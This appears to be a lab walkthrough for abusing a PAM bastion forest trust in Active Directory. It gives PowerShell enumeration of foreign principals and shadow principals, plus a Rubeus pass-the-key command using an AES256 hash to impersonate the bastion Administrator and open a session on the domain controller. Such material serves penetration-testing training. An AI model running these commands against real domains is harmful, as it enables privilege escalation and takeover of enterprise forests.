First Let’s Enumerate the Foreign Principles

Find-ForeignGroup -Verbose -Domain bastion.local

We will see that SID is added to the Domain Local Administrators Group in bastion.local Domain

Now let’s Convert The SID to Username

$SID = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-2781415573-3701854478-2406986946-500")
$User = $SID.Translate([System.Security.Principal.NTAccount])
$User.Value

Notice that the Username that is added to the Domain Local Administrators Group In bastion.local Domain is —> Techcorp\Administrator the Enterprise Admin of techcorp.local domain

Now let’s start a new process as bastion Administrator

.\\Rubeus.exe asktgt /user:Administrator /domain:bastion.local /aes256:a32d8d07a45e115fa499cf58a2d98ef5bf49717af58bc4961c94c3c95fc03292 /dc:bastion-dc.bastion.local /createnetonly:C:\\Windows\\System32\\cmd.exe /show

Now let’s enter the bastion-dc server

Enter-PSSession -ComputerName bastion-dc.bastion.local

Now let’s check the PAM trust with the production.local

Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} -Server production.local

Now let’s validate via searching Shadow Principles

Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl